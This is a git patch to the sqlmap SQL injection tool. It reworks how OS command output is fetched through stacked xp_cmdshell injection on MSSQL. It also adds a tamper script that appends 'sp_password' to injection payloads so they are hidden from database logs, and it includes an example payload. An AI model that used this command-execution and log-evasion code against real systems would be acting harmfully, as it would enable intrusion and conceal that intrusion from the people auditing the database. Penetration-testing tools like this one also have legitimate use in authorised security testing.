From 982fcde1c0fd5c518796dfde5268f356aaf3aae6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 6 Jul 2012 12:24:55 +0200 Subject: [PATCH] Fix for Issue #62 --- lib/core/bigarray.py | 8 ++++++++ lib/takeover/xp_cmdshell.py | 23 +++++------------------ tamper/sp_password.py | 33 +++++++++++++++++++++++++++++++++ 3 files changed, 46 insertions(+), 18 deletions(-) create mode 100644 tamper/sp_password.py diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index 19f9e91fc..05a5d04a0 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -69,6 +69,14 @@ class BigArray(list): with open(self.chunks[index], "rb") as fp: self.cache = Cache(index, pickle.load(fp), False) + def __getslice__(self, i, j): + retval = BigArray() + i = max(0, len(self) + i if i < 0 else i) + j = min(len(self), len(self) + j if j < 0 else j) + for _ in xrange(i, j): + retval.append(self[_]) + return retval + def __getitem__(self, y): index = y / BIGARRAY_CHUNK_LENGTH offset = y % BIGARRAY_CHUNK_LENGTH diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index 9c80d7f3d..3f72d18b9 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -9,6 +9,7 @@ from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import getSPQLSnippet from lib.core.common import hashDBWrite +from lib.core.common import isListLike from lib.core.common import isNoneValue from lib.core.common import pushValue from lib.core.common import popValue @@ -154,8 +155,6 @@ class xp_cmdshell: return inject.goStacked(cmd, silent) def xpCmdshellEvalCmd(self, cmd, first=None, last=None): - self.getRemoteTempPath() - if conf.direct: output = self.xpCmdshellExecCmd(cmd) @@ -170,23 +169,11 @@ class xp_cmdshell: output = new_output else: - tmpFile = "%s/tmpc%s.txt" % (conf.tmpPath, randomStr(lowercase=True)) - cmd = "%s > \"%s\"" % (cmd, tmpFile) - - self.xpCmdshellExecCmd(cmd) - - inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, tmpFile, randomStr(10), randomStr(10))) - - self.delRemoteFile(tmpFile) - - output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False) + inject.goStacked("INSERT INTO %s EXEC %s '%s'" % (self.cmdTblName, self.xpCmdshellStr, cmd)) + output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False) inject.goStacked("DELETE FROM %s" % self.cmdTblName) - - if output and isinstance(output, (list, tuple)): - output = output[0] - - if output and isinstance(output, (list, tuple)): - output = output[0] + if output and isListLike(output): + output = output[1:] return output diff --git a/tamper/sp_password.py b/tamper/sp_password.py new file mode 100644 index 000000000..4ee9eba06 --- /dev/null +++ b/tamper/sp_password.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2012 sqlmap developers (http://www.sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGH + +def tamper(payload): + """ + Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs + + Example: + * Input: 1 AND 9227=9227-- + * Output: 1 AND 9227=9227--sp_password + + Requirement: + * MSSQL + + Notes: + * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure + * Reference: http://websec.ca/kb/sql_injection + """ + + retVal = "" + + if payload: + retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "") + + return retVal